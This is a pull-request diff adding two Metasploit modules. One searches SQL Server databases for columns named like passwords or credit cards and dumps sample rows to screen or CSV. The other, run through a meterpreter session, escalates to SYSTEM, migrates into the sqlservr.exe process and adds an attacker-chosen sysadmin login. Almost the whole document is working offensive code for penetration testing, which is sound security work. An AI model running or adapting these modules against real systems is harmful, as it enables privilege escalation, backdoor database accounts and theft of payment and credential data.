### PR TITLE
MSSQL Local Authorization Bypass (POST MODULE)

### DIFF
--- a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
+++ b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
@@ -9,9 +9,8 @@
 #  thank you humble-desser, DarkOperator, HDM,
 #  and todb for helping me refine this MSF Module.
 #
-#  Finally I woud like to thank the Academy for 
-#  time and consideration. :)
-#
+#  Finally, I would like to thank the Academy for 
+#  their time and consideration. :)
 ##
 
 ## 

--- a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
+++ b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
@@ -1,0 +1,462 @@
+##
+# $Id: mssql_FindandSampleData.rb 2011-11-15 nullbind $
+##
+
+##
+#  Credits: 
+#  Thank you Dijininja for your original IDF 
+#  module.  Also, thank you  humble-desser and DarkOperator
+#  helping me work through a few critical issues.
+##
+
+## 
+#  Use Case:
+#  This script will search through all of the non-default 
+#  databases on the SQL Server for columns that match the 
+#  keywords defined in the TSQL KEYWORDS option. If column 
+#  names are found that match the defined keywords and 
+#  data is present in the associated tables, the script 
+#  will select a sample of the records from each 
+#  of the affected tables.  The sample size is determined
+#  by the SAMPLESIZE option.  Also, the results can be written to a
+#  CSV file if the OUTPUT is set to "yes" and an OUTPUTPATH option is set.
+#
+#  This script is valuable for gathering evidence during PCI
+#  penetration tests and could even be used during the PCI 
+#  data dicovery process.
+#
+#  Important note: This script only works on SQL Server 2005 and 2008
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::MSSQL
+	include Msf::Auxiliary::Scanner
+	include Msf::Auxiliary::Report
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Microsoft SQL Server - Find and Sample Data',
+			'Description'    => %q{This script will search through all of the non-default databases 
+			on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS 
+			option. If column names are found that match the defined keywords and data is present 
+			in the associated tables, the script will select a sample of the records from each of 
+			the affected tables.  The sample size is determined by the SAMPLESIZE option.  Also, 
+			the results can be written to a CSV file if the OUTPUT is set to "yes" and the 
+			OUTPUTPATH option is set.
+			},
+			'Author'         => [ 'Scot Sutherland (nullbind) <scott.sutherland@netspi.com>' ],
+			'Version'        => '$Revision: 12196 $',
+			'License'        => MSF_LICENSE,
+			'References'     => [[ 'URL', 'http://www.netspi.com/blog/author/ssutherland/' ]],
+			'Targets'        => [[ 'MSSQL 2005', { 'ver' => 2005 }]]
+		))
+
+		register_options(
+			[
+				OptString.new('KEYWORDS', [ true, 'Keywords to search for','passw|credit|card']),
+				OptString.new('SAMPLESIZE', [ true, 'Number of rows to sample',  '1']),
+				OptString.new('OUTPUT', [ false, 'Generate CSV file from search results',  'no']),
+				OptString.new('OUTPUTPATH', [ false, 'File output path (C:\\\filename.csv)',  '']),
+			], self.class)
+	end
+
+	def print_with_underline(str)
+		print_line(str)
+		print_line("=" * str.length)
+	end
+
+	def run_host(ip)
+	
+		#SETUP PRETTY OPTION VARIABLES FOR LATER USE		
+		opt_sample = datastore['SAMPLESIZE']
+		opt_ouput = datastore['OUTPUT']
+		opt_outputpath = datastore['OUTPUTPATH']
+		opt_keywords = datastore['KEYWORDS']
+	
+		#DEFINED HEADER TEXT
+		headings = [
+			["Server","Database", "Schema", "Table", "Column", "Data Type", "Sample Data","Row Count"]
+		]
+
+		#DEFINE SEARCH QUERY AS VARIABLE
+		sql = "
+		-- CHECK IF VERSION IS COMPATABLE > than 2000
+		IF (SELECT SUBSTRING(CAST(SERVERPROPERTY('ProductVersion') as VARCHAR), 1, 
+		CHARINDEX('.',cast(SERVERPROPERTY('ProductVersion') as VARCHAR),1)-1)) > 8
+		BEGIN
+			
+			-- TURN OFF ROW COUNT
+			SET NOCOUNT ON;			
+			--------------------------------------------------
+			-- SETUP UP SAMPLE SIZE
+			--------------------------------------------------
+			DECLARE @SAMPLE_COUNT varchar(MAX);
+			SET @SAMPLE_COUNT = #{opt_sample};
+
+			--------------------------------------------------
+			-- SETUP KEYWORDS TO SEARCH
+			--------------------------------------------------
+			DECLARE @KEYWORDS varchar(MAX);	
+			SET @KEYWORDS = '#{opt_keywords}|';
+			
+			--------------------------------------------------
+			--SETUP WHERE STATEMENT CONTAINING KEYWORDS
+			--------------------------------------------------
+			DECLARE @SEARCH_TERMS varchar(MAX);	
+			SET @SEARCH_TERMS = ''; -- Leave this blank
+
+			-- START WHILE LOOP HERE -- BEGIN TO ITTERATE THROUGH KEYWORDS
+				
+				WHILE LEN(@KEYWORDS) > 0 
+					BEGIN
+						--SET VARIABLES UP FOR PARSING PROCESS
+						DECLARE @change int
+						DECLARE @keyword varchar(MAX)
+							
+						--SET KEYWORD CHANGE TRACKER
+						SELECT @change = CHARINDEX('|',@KEYWORDS); 		
+							
+						--PARSE KEYWORD	
+						SELECT @keyword = SUBSTRING(@KEYWORDS,0,@change) ;
+							
+						-- PROCESS KEYWORD AND GENERATE WHERE CLAUSE FOR IT	
+						SELECT @SEARCH_TERMS = 'LOWER(COLUMN_NAME) like ''%'+@keyword+'%'' or '+@SEARCH_TERMS
+
+						-- REMOVE PROCESSED KEYWORD
+						SET @KEYWORDS = SUBSTRING(@KEYWORDS,@change+1,LEN(@KEYWORDS));
+						
+					END			    		
+				-- REMOVE UNEEDED 					
+				SELECT @SEARCH_TERMS = SUBSTRING(@SEARCH_TERMS,0,LEN(@SEARCH_TERMS)-2);
+
+			--------------------------------------------------
+			-- CREATE GLOBAL TEMP TABLES
+			--------------------------------------------------
+			USE master;
+
+			IF OBJECT_ID('tempdb..##mytable') IS NOT NULL DROP TABLE ##mytable;
+			IF OBJECT_ID('tempdb..##mytable') IS NULL 
+			BEGIN 
+				CREATE TABLE ##mytable (
+					server_name varchar(MAX),
+					database_name varchar(MAX),
+					table_schema varchar(MAX),
+					table_name varchar(MAX),		
+					column_name varchar(MAX),
+					column_data_type varchar(MAX)
+				) 
+			END
+
+			IF OBJECT_ID('tempdb..##mytable2') IS NOT NULL DROP TABLE ##mytable2;
+			IF OBJECT_ID('tempdb..##mytable2') IS NULL 
+			BEGIN 
+				CREATE TABLE ##mytable2 (
+					server_name varchar(MAX),
+					database_name varchar(MAX),
+					table_schema varchar(MAX),
+					table_name varchar(MAX),
+					column_name varchar(MAX),
+					column_data_type varchar(MAX),
+					column_value varchar(MAX),
+					column_data_row_count varchar(MAX)
+				) 
+			END
+
+			--------------------------------------------------
+			-- CURSOR1
+			-- ENUMERATE COLUMNS FROM EACH DATABASE THAT 
+			-- CONTAIN KEYWORD AND WRITE THEM TO A TEMP TABLE 
+			--------------------------------------------------
+
+			-- SETUP SOME VARIABLES FOR THE MYCURSOR1
+			DECLARE @var1 varchar(max);
+			DECLARE @var2 varchar(max);
+
+			--------------------------------------------------------------------
+			-- CHECK IF ANY NON-DEFAULT DATABASE EXIST
+			--------------------------------------------------------------------
+			IF (SELECT count(*) 
+			FROM master..sysdatabases 
+			WHERE name NOT IN ('master','tempdb','model','msdb') 
+			and HAS_DBACCESS(name) <> 0) <> 0 
+			BEGIN
+				DECLARE MY_CURSOR1 CURSOR
+				FOR
+
+				SELECT name FROM master..sysdatabases 
+				WHERE name NOT IN ('master','tempdb','model','msdb') 
+				and HAS_DBACCESS(name) <> 0;
+
+				OPEN MY_CURSOR1
+				FETCH NEXT FROM MY_CURSOR1 INTO @var1
+				WHILE @@FETCH_STATUS = 0   
+				BEGIN  	
+				---------------------------------------------------
+				-- SEARCH FOR KEYWORDS/INSERT RESULTS INTO MYTABLE			
+				---------------------------------------------------
+				SET @var2 = ' 	
+				INSERT INTO ##mytable
+				SELECT @@SERVERNAME as SERVER_NAME,
+				TABLE_CATALOG as DATABASE_NAME,
+				TABLE_SCHEMA,
+				TABLE_NAME,
+				COLUMN_NAME,
+				DATA_TYPE
+				FROM ['+@var1+'].[INFORMATION_SCHEMA].[COLUMNS] WHERE '
+				
+				--APPEND KEYWORDS TO QUERY
+				DECLARE @fullquery VARCHAR(MAX);
+				SET @fullquery = @var2+@SEARCH_TERMS;				
+					
+				EXEC(@fullquery);	
+				FETCH NEXT FROM MY_CURSOR1 INTO @var1
+
+				END   
+				CLOSE MY_CURSOR1
+				DEALLOCATE MY_CURSOR1
+				-------------------------------------------------
+				-- CURSOR2
+				-- TAKE A X RECORD SAMPLE FROM EACH OF THE COLUMNS
+				-- THAT MATCH THE DEFINED KEYWORDS
+				-- NOTE: THIS WILL NOT SAMPLE EMPTY TABLES
+				-------------------------------------------------
+				
+				IF (SELECT COUNT(*) FROM ##mytable) < 1
+					BEGIN	
+						SELECT 'No columns where found that match the defined keywords.' as Message;
+					END
+				ELSE
+					BEGIN			
+						DECLARE @var_server varchar(max)
+						DECLARE @var_database varchar(max)
+						DECLARE @var_table varchar(max)
+						DECLARE @var_table_schema varchar(max)
+						DECLARE @var_column_data_type varchar(max)
+						DECLARE @var_column varchar(max)
+						DECLARE @myquery varchar(max)
+						DECLARE @var_column_data_row_count varchar(MAX)
+						
+						DECLARE MY_CURSOR2 CURSOR
+						FOR
+						SELECT server_name,database_name,table_schema,table_name,column_name,column_data_type
+						FROM ##mytable
+
+							OPEN MY_CURSOR2
+							FETCH NEXT FROM MY_CURSOR2 INTO @var_server,
+							@var_database,
+							@var_table_schema,
+							@var_table,
+							@var_column,
+							@var_column_data_type
+							WHILE @@FETCH_STATUS = 0   
+							BEGIN  
+							----------------------------------------------------------------------
+							-- ADD AFFECTED SERVER/SCHEMA/TABLE/COLUMN/DATATYPE/SAMPLE DATA TO MYTABLE2
+							----------------------------------------------------------------------
+							-- GET COUNT
+							DECLARE @mycount_query as varchar(MAX);
+							DECLARE @mycount as varchar(MAX);
+
+							-- CREATE TEMP TABLE TO GET THE COLUMN DATA ROW COUNT
+							IF OBJECT_ID('tempdb..#mycount') IS NOT NULL DROP TABLE #mycount
+							CREATE TABLE #mycount(mycount VARCHAR(MAX));
+							
+							-- SETUP AND EXECUTE THE COLUMN DATA ROW COUNT QUERY
+							SET @mycount_query = 'INSERT INTO #mycount SELECT DISTINCT 
+												COUNT('+@var_column+') FROM '+@var_database+'.
+												'+@var_table_schema+'.'+@var_table;
+							EXEC(@mycount_query);
+
+							-- SET THE COLUMN DATA ROW COUNT
+							SELECT @mycount = mycount FROM #mycount;		
+							
+							-- REMOVE TEMP TABLE
+							IF OBJECT_ID('tempdb..#mycount') IS NOT NULL DROP TABLE #mycount				
+
+							SET @myquery = ' 	
+							INSERT INTO ##mytable2 
+										(server_name,
+										database_name,
+										table_schema,
+										table_name,
+										column_name,
+										column_data_type,
+										column_value,
+										column_data_row_count) 
+							SELECT TOP '+@SAMPLE_COUNT+' ('''+@var_server+''') as server_name,
+										('''+@var_database+''') as database_name,
+										('''+@var_table_schema+''') as table_schema,
+										('''+@var_table+''') as table_name,
+										('''+@var_column+''') as comlumn_name,
+										('''+@var_column_data_type+''') as column_data_type,
+										'+@var_column+','+@mycount+' as column_data_row_count 
+							FROM ['+@var_database+'].['+@var_table_schema++'].['+@var_table+'] 
+							WHERE '+@var_column+' IS NOT NULL;
+							'	
+							EXEC(@myquery);
+
+							FETCH NEXT FROM MY_CURSOR2 INTO 
+										@var_server,
+										@var_database,
+										@var_table_schema,
+										@var_table,@var_column,
+										@var_column_data_type
+							END   
+						CLOSE MY_CURSOR2
+						DEALLOCATE MY_CURSOR2
+
+						-----------------------------------
+						-- SELECT THE RESULTS OF THE SEARCH
+						-----------------------------------
+						IF (SELECT @SAMPLE_COUNT)= 1
+							BEGIN
+								SELECT DISTINCT cast(server_name as CHAR) as server_name,
+								cast(database_name as char) as database_name,
+								cast(table_schema as char) as table_schema,
+								cast(table_name as char) as table_schema,
+								cast(column_name as char) as column_name,
+								cast(column_data_type as char) as column_data_type,
+								cast(column_value as char) as column_data_sample,
+								cast(column_data_row_count as char) as column_data_row_count FROM ##mytable2 								
+							END	
+						ELSE
+							BEGIN
+								SELECT DISTINCT cast(server_name as CHAR) as server_name,
+								cast(database_name as char) as database_name,
+								cast(table_schema as char) as table_schema,
+								cast(table_name as char) as table_schema,
+								cast(column_name as char) as column_name,
+								cast(column_data_type as char) as column_data_type,
+								cast(column_value as char) as column_data_sample,
+								cast(column_data_row_count as char) as column_data_row_count FROM ##mytable2 							
+							END
+					END
+			-----------------------------------
+			-- REMOVE GLOBAL TEMP TABLES
+			-----------------------------------
+			IF OBJECT_ID('tempdb..##mytable') IS NOT NULL DROP TABLE ##mytable;
+			IF OBJECT_ID('tempdb..##mytable2') IS NOT NULL DROP TABLE ##mytable2;
+				
+			END
+			ELSE
+			BEGIN
+				----------------------------------------------------------------------
+				-- RETURN ERROR MESSAGES IF THERE ARE NOT DATABASES TO ACCESS
+				----------------------------------------------------------------------
+				IF (SELECT count(*) FROM master..sysdatabases 
+				WHERE name NOT IN ('master','tempdb','model','msdb')) < 1	
+					SELECT 'No non-default databases exist to search.' as Message;
+				ELSE
+					SELECT 'Non-default databases exist, 
+					but the current user does not have 
+					the privileges to access them.' as Message;				
+				END
+		END
+		else
+		BEGIN
+			SELECT 'This module only works on SQL Server 2005 and above.';
+		END
+		
+		SET NOCOUNT OFF;"
+		
+		#STATUSING
+		print_line(" ")
+		print_line("[*] STATUS: Attempting to connect to the SQL Server at #{rhost}:#{rport}...")
+		
+		#CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
+		begin
+			result = mssql_query(sql, false) if mssql_login_datastore
+			column_data = result[:rows]
+			print_line("[*] STATUS: Connected to #{rhost}:#{rport} successfully.")			
+			rescue
+			print_line("[-] ERROR : Connection to #{rhost}:#{rport} failed.")
+			return
+		end
+
+		#STATUSING		
+		print_line("[*] STATUS: Attempting to retrieve data ...")
+				
+		if (column_data.count < 7) 
+			#Return error from SQL server
+			column_data.each { |row|
+				print_line("[*] STATUS: #{row.to_s.gsub("[","").gsub("]","").gsub("\"","")}")
+			}
+		return
+		else
+			#Setup column width for standard query results
+			column_data.each { |row|
+				0.upto(7) { |col|
+					row[col] = row[col].strip.to_s	
+					}		
+			}
+			print_line(" ")
+		end
+						
+		#SETUP ROW WIDTHS
+		widths = [0, 0, 0, 0, 0, 0, 0, 0]		
+		(column_data|headings).each { |row|
+			0.upto(7) { |col|				
+				widths[col] = row[col].to_s.length if row[col].to_s.length > widths[col] 
+			}
+		}		
+		
+		#PRINT HEADERS
+		buffer1 = ""
+		buffer2 = ""
+		headings.each { |row|
+			0.upto(7) { |col|
+				buffer1 += row[col].ljust(widths[col] + 1)
+				buffer2 += row[col]+ ","
+			}
+			print_line(buffer1)	
+			buffer2 = buffer2.chomp(",")+ "\n"	 
+			File.open(opt_outputpath, 'ab') do |myfile| myfile.print(buffer2) 		
+			end if (opt_ouput.downcase == "yes" and opt_outputpath.downcase != "")			
+		}
+		
+		#PRINT DIVIDERS
+		buffer1 = ""
+		buffer2 = ""
+		headings.each { |row|
+			0.upto(7) { |col|
+				divider = "=" * widths[col] + " "
+				buffer1 += divider.ljust(widths[col] + 1)
+			}
+			print_line(buffer1)				
+		}
+
+		#PRINT DATA
+		buffer1 = ""
+		buffer2 = ""		
+		print_line("")
+		column_data.each { |row|
+			0.upto(7) { |col|
+				buffer1 += row[col].ljust(widths[col] + 1)
+				buffer2 += row[col] + ","
+			}
+			print_line(buffer1)
+			buffer2 = buffer2.chomp(",")+ "\n"	
+			# Write query output to the defined file path 
+			# Note: This will overwrite existing files
+			File.open(opt_outputpath, 'ab') do |myfile| myfile.print(buffer2) 
+			end if (opt_ouput.downcase == "yes" and opt_outputpath.downcase != "")
+			buffer1 = ""
+			buffer2 = ""
+			print_line(buffer1)						
+		}
+		disconnect	
+		
+		#CHECK IF QUERY OUTPUT WAS WRITTEN TO THE FILE
+		if File.exist?(opt_outputpath) 
+			print_line("[*] The query output from #{rhost} has been written to: #{opt_outputpath}")
+		else
+			print_line("[*] The query output from #{rhost} was NOT written to a file.")
+		end
+		
+
+	end
+end

--- a/modules/post/windows/manage/mssql_local_auth_bypass.rb
+++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb
@@ -1,0 +1,478 @@
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/file'
+
+
+class Metasploit3 < Msf::Post
+
+	def initialize(info={})
+		super( update_info( info,
+				'Name'          => 'SQL Server - Local Authorization Bypass - Add SYSADMIN',
+				'Description'   => %q{ When this module is executed via an existing 
+				meterpreter session it can be used to add a sysadmin to local 
+				SQL Server instances.  It first attempts to gain LocalSystem privileges 
+				using the "getsystem" escalation methods. If those privileges are not
+				sufficient to add a sysadmin, then it will migrate to the SQL Server 
+				service process associated with the target instance.  The sysadmin 
+				login is added to the local SQL Server using native SQL clients and 
+				stored procedures.  If no instance is specified then the first identified 
+				instance will be used.  
+				
+				Why is this possible? By default in SQL Server 2k-2k8, LocalSystem  
+				is assigned syadmin privileges.  Microsoft changed the default in 
+				SQL Server 2012 so that LocalSystem no longer has sysadmin privileges.
+				However, this can be overcome by migrating to the SQL Server process.},
+				'License'       => MSF_LICENSE,
+				'Author'        => [ 'Scott Sutherland <scott.sutherland@netspi.com>'],
+				'Platform'      => [ 'Windows' ],
+				'SessionTypes'  => [ 'meterpreter' ]
+			))
+
+		register_options(
+			[
+				OptString.new('DB_USERNAME',  [true, 'New sysadmin login', '']),
+				OptString.new('DB_PASSWORD',  [true, 'Password for new sysadmin login', '']),
+				OptString.new('INSTANCE',  [false, 'Name of target SQL Server instance', '']),
+				OptBool.new('REMOVE_LOGIN',  [false, 'Remove DB_USERNAME login from database', 'false']),
+				OptBool.new('VERBOSE',  [false, 'Set how verbose the output should be', 'false']),
+			], self.class)
+	end
+	
+	# TODO
+	# - test execute thread migration option
+	# - test incognito token stuff
+	# - test all fucntions on all version
+	# - run through ruby module validation process
+
+	def run
+				
+		# Set verbosity level
+		verbose = datastore['verbose'].to_s.downcase 
+		
+		# Set instance name (if specified)
+		instance = datastore['instance'].to_s.upcase
+		
+		# Display target
+		print_status("Running module against #{sysinfo['Computer']}")	
+	
+		# Get LocalSystem privileges				
+		system_status = givemesystem
+		if system_status[0]						
+			
+			# Check if a SQL Server service is running
+			service_instance = check_for_sqlserver(instance)			
+			if service_instance != 0
+								
+				# Identify available native SQL client				
+				sql_client = get_sql_client()				
+				if sql_client != 0
+									
+					# Check if remove_login was selected
+					if datastore['REMOVE_LOGIN'].to_s.downcase == "false"
+											
+						# Add new login						
+						add_login_status = add_sql_login(sql_client,datastore['DB_USERNAME'],datastore['DB_PASSWORD'],instance,service_instance,verbose)
+						if add_login_status == 1
+						
+							# Add login to sysadmin fixed server role							
+							add_sysadmin(sql_client,datastore['DB_USERNAME'],datastore['DB_PASSWORD'],instance,service_instance,verbose)
+						else						
+							
+							if add_login_status != "userexists" then
+							
+								# Attempt to impersonate sql server service account (for sql server 2012)							
+								impersonate_status = impersonate_sql_user(service_instance,verbose)
+								if impersonate_status == 1								
+									
+									# Add new login						
+									add_login_status = add_sql_login(sql_client,datastore['DB_USERNAME'],datastore['DB_PASSWORD'],instance,service_instance,verbose)
+									if add_login_status == 1
+									
+										# Add login to sysadmin fixed server role							
+										add_sysadmin(sql_client,datastore['DB_USERNAME'],datastore['DB_PASSWORD'],instance,service_instance,verbose)									
+									end
+								end
+							end
+						end
+					else						
+						
+						# Remove login
+						remove_status = remove_sql_login(sql_client,datastore['DB_USERNAME'],instance,service_instance,verbose)
+						if remove_status == 0
+								
+							# Attempt to impersonate sql server service account (for sql server 2012)							
+							impersonate_status = impersonate_sql_user(service_instance,verbose)
+							if impersonate_status == 1
+								
+								# Remove login				
+								remove_sql_login(sql_client,datastore['DB_USERNAME'],instance,service_instance,verbose)
+							end
+						end
+					end						
+				end
+			end
+		else
+			print_error("Could not obtain LocalSystem privileges")
+		end
+	
+		# return to original priv context
+		session.sys.config.revert_to_self	
+	end
+	
+	
+	## ----------------------------------------------
+	## Method to check if the SQL Server service is running
+	## ----------------------------------------------
+	def check_for_sqlserver(instance)
+	
+		print_status("Checking for SQL Server...") 
+		
+		# Get Data
+		running_services = run_cmd("net start")	
+		
+		# Parse Data
+		services_array = running_services.split("\n")		
+		
+		# Check for the SQL Server service
+		services_array.each do |service|		
+			if instance == "" then			
+				# Target default instance
+				if service =~ /SQL Server \(| MSSQLSERVER/ then 					
+
+					# Display results
+					service_instance = service.gsub(/SQL Server \(/, "").gsub(/\)/, "").lstrip.rstrip
+					print_good("SQL Server instance found: #{service_instance}")				
+					return service_instance
+				end
+			else
+			
+				# Target user defined instance
+				if service =~ /#{instance}/ then 				
+					
+					# Display user defined instance				
+					print_good("SQL Server instance found: #{instance}")				
+					return instance
+				end
+			end
+		end		
+		
+		# Fail
+		if instance == "" then	
+			print_error("SQL Server instance NOT found")		
+		else
+			print_error("SQL Server instance \"#{instance}\" was NOT found")		
+		end
+		return 0
+	end
+
+	
+	## ----------------------------------------------
+	## Method for identifying which SQL client to use
+	## ----------------------------------------------
+	def get_sql_client
+	
+		print_status("Checking for native client...") 
+	
+		# Get Data - osql
+		running_services1 = run_cmd("osql -?")	
+		
+		# Parse Data - osql
+		services_array1 = running_services1.split("\n")
+		
+		# Check for osql
+		services_array1.each do |service1|
+			if service1 =~ /SQL Server Command Line Tool/ then 
+				print_good("OSQL client was found")
+				return "osql"
+			end
+		end				
+		
+		# Get Data - sqlcmd
+		running_services = run_cmd("sqlcmd -?")			
+		
+		# Parse Data - sqlcmd
+		services_array = running_services.split("\n")
+		
+		# Check for SQLCMD
+		services_array.each do |service|
+			if service =~ /SQL Server Command Line Tool/ then
+				print_good("SQLCMD client was found")
+				return "sqlcmd"
+			end
+		end		
+		
+		# Fail
+		print_error("No native SQL client was found")
+		return 0
+	end
+
+	## ----------------------------------------------
+	## Method for adding a login
+	## ----------------------------------------------
+	def add_sql_login(sqlclient,dbuser,dbpass,instance,service_instance,verbose)
+		
+		print_status("Attempting to add new login #{dbuser}...") 		
+					
+		# Setup command format to accomidate version inconsistencies
+		if instance == ""			
+			# Check default instance name
+			if service_instance == "MSSQLSERVER" then
+				print_status(" o MSSQL Service instance: #{service_instance}") if verbose == "true" 
+				sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']} -Q \"sp_addlogin '#{dbuser}','#{dbpass}'\""	
+			else
+				# User defined instance
+			print_status(" o  OTHER Service instance: #{service_instance}") if verbose == "true" 
+			sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']}\\#{service_instance} -Q \"sp_addlogin '#{dbuser}','#{dbpass}'\""	
+			end
+		else
+			# User defined instance
+			print_status(" o defined instance: #{service_instance}") if verbose == "true" 
+			sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']}\\#{instance} -Q \"sp_addlogin '#{dbuser}','#{dbpass}'\""		
+		end
+
+		# Display debugging information
+		print_status("Running command:") if verbose == "true" 
+		print_status("#{sqlcommand}") if verbose == "true" 
+		
+		# Get Data
+		add_login_result = run_cmd("#{sqlcommand}")
+		
+		# Parse Data 
+		add_login_array = add_login_result.split("\n")	
+		
+		# Check if user exists 
+		add_login_array.each do |service|
+		
+			if service =~ /already exists/ then
+				print_error("Unable to add login #{dbuser}, user already exists")
+				return "userexists"			
+			end	
+		end
+				
+		# check for success/fail
+		if add_login_result == ""
+			print_good("Successfully added login \"#{dbuser}\" with password \"#{dbpass}\"")	
+			return 1
+		else
+			print_error("Unabled to add login #{dbuser}")
+			print_error("Database Error:\n #{add_login_result}")
+			return 0
+		end
+	end
+	
+	
+	## ----------------------------------------------
+	## Method for adding a login to sysadmin role
+	## ----------------------------------------------
+	def add_sysadmin(sqlclient,dbuser,dbpass,instance,service_instance,verbose)
+		
+		print_status("Attempting to make #{dbuser} login a sysadmin...") 
+		
+		# Setup command format to accomidate command inconsistencies
+		if instance == ""			
+			# Check default instance name
+			if service_instance == "MSSQLSERVER" then												
+				sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']} -Q \"sp_addsrvrolemember '#{dbuser}','sysadmin';if (select is_srvrolemember('sysadmin'))=1 begin select 'bingo' end \""				
+			else 											
+				sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']}\\#{service_instance} -Q \"sp_addsrvrolemember '#{dbuser}','sysadmin';if (select is_srvrolemember('sysadmin'))=1 \
+				begin select 'bingo' end \""				
+			end
+		else								
+			sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']}\\#{instance} -Q \"sp_addsrvrolemember '#{dbuser}','sysadmin';if (select is_srvrolemember('sysadmin'))=1 begin select 'bingo' end \""	
+		end
+	
+		# Display debugging information		
+		print_status("Running command:") if verbose == "true" 
+		print_status("#{sqlcommand}") if verbose == "true" 
+		
+		# Get Data
+		add_sysadmin_result = run_cmd("#{sqlcommand}")
+		
+		# Parse Data 
+		add_sysadmin_array = add_sysadmin_result.split("\n")
+		
+		# Check for success
+		check = 0
+		add_sysadmin_array.each do |service|
+			if service =~ /bingo/ then
+					check = 1
+			end
+		end	
+		
+		# Display results to user
+		if check == 1				
+			print_good("Successfully added \"#{dbuser}\" to sysadmin role")
+			return 1			
+		else 		
+			# Fail
+			print_error("Unabled to add #{dbuser} to sysadmin role")
+			print_error("Database Error:\n\n #{add_sysadmin_result}")
+			return 0		
+		end
+	end
+
+	
+	## ----------------------------------------------
+	## Method for removing login
+	## ----------------------------------------------
+	def remove_sql_login(sqlclient,dbuser,instance,service_instance,verbose)
+	
+		print_status("Attempting to remove login \"#{dbuser}\"")
+	
+		# Setup command format to accomidate command inconsistencies
+		if instance == ""			
+			# Check default instance name
+			if service_instance == "SQLEXPRESS" then			
+				# Set command here for SQLEXPRESS											
+				sqlcommand = "#{sqlclient} -E -S .\\SQLEXPRESS  -Q \"sp_droplogin '#{dbuser}'\""				
+			else 															
+				sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']} -Q \"sp_droplogin '#{dbuser}'\""				
+			end
+		else		
+			# Set command here						
+			sqlcommand = "#{sqlclient} -E -S .\\#{instance} -Q \"sp_droplogin '#{dbuser}'\""
+		end
+		
+		# Display debugging information
+		print_status("Settings:") if verbose == "true" 
+		print_status(" o SQL Client: #{sqlclient}") if verbose == "true" 
+		print_status(" o User: #{dbuser}") if verbose == "true" 	
+		print_status(" o Service instance: #{service_instance}") if verbose == "true" 
+		print_status(" o User defined instance: #{instance}") if verbose == "true" 		
+		print_status("Command:") if verbose == "true" 
+		print_status("#{sqlcommand}") if verbose == "true" 
+		
+		# Get Data
+		remove_login_result = run_cmd("#{sqlcommand}")
+		
+		# Parse Data 
+		remove_login_array = remove_login_result.split("\n")
+		
+		# Check for success
+		check = 0
+		remove_login_array.each do |service|
+			if service =~ // then
+					check = 1
+			end
+		end	
+		
+		# Display result
+		if check == 0			
+			print_good("Successfully removed login \"#{dbuser}\"")	
+			return 1			
+		else 		
+			# Fail
+			print_error("Unabled to remove login #{dbuser}")
+			print_error("Database Error:\n\n #{remove_login_result}")
+			return 0			
+		end
+	end
+		
+	## ----------------------------------------------
+	## Method for executing cmd and returning the response
+	## 
+	## Note: This is from one of Jabra's modules - Thanks man!
+	## #craps out when escalating from local admin to system
+	##----------------------------------------------
+	def run_cmd(cmd,token=true)
+		opts = {'Hidden' => true, 'Channelized' => true, 'UseThreadToken' => token} 
+		process = session.sys.process.execute(cmd, nil, opts)
+		res = ""
+		while (d = process.channel.read)
+			break if d == ""
+			res << d
+		end
+		process.channel.close
+		process.close
+		return res
+	end
+	
+	
+	## ----------------------------------------------
+	## Method for impersonating sql server instance
+	## ----------------------------------------------
+	def impersonate_sql_user(service_instance,verbose)
+	
+		# Print the current user
+		blah = session.sys.config.getuid if verbose == "true" 
+		print_status("Current user: #{blah}") if verbose == "true" 
+		
+		# Define target user/pid
+		targetuser = ""
+		targetpid = ""
+
+		# Identify SQL Server service processes
+		print_status("Searching for sqlservr.exe processes not running as SYSTEM...")
+		session.sys.process.get_processes().each do |x|
+		
+			# Search for all sqlservr.exe processes
+			if ( x['name'] == "sqlservr.exe" and x['user'] != "NT AUTHORITY\\SYSTEM")	
+			
+				# Found one
+				print_good("Found \"#{x['user']}\" running sqlservr.exe process #{x['pid']}") 
+						
+				# Define target pid / user
+				if x['user'] =~ /NT SERVICE/ then
+					if x['user'] == "NT SERVICE\\MSSQL$#{service_instance}" then						 
+						targetuser = "NT SERVICE\\MSSQL$#{service_instance}"
+						targetpid = x['pid'] 					
+					end
+				else 					
+					targetuser = x['user']
+					targetpid = x['pid']
+				end
+			end
+		end
+	
+		# Attempt to migrate to target sqlservr.exe process
+		if targetuser == "" then
+			print_error("Unable to find sqlservr.exe process not running as SYSTEM")
+			return 0
+		else 			
+			begin
+				# Migrating works, but I can't rev2self after its complete
+				print_status("Attempting to migrate to process #{targetpid}...")
+				session.core.migrate(targetpid.to_i)
+			
+				# Statusing
+				blah = session.sys.config.getuid if verbose == "true" 
+				print_status("Current user: #{blah}") if verbose == "true" 								
+				print_good("Successfully migrated to sqlservr.exe process #{targetpid}")
+				return 1
+			rescue
+				print_error("Unable to migrate to sqlservr.exe process #{targetpid}")
+				return 0			
+			end
+		end		
+	end	
+	
+	##
+	## Check user is already system
+	##
+	def givemesystem
+		
+		# Statusing
+		print_status("Checking if user is SYSTEM...")		
+		
+		# Check if user is system
+		if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM"
+			print_good("User is SYSTEM")
+			return 1
+		else			
+			# Attempt to get LocalSystem privileges
+			print_error("User is NOT SYSTEM")
+			print_status("Attempting to get SYSTEM privileges...")
+			system_status = session.priv.getsystem
+			if system_status[0]			
+				print_good("Success!, user is now SYSTEM")
+				return 1
+			else
+				print_error("Unable to obtained SYSTEM privileges")
+				return 0
+			end
+		end
+	end
+	
+end

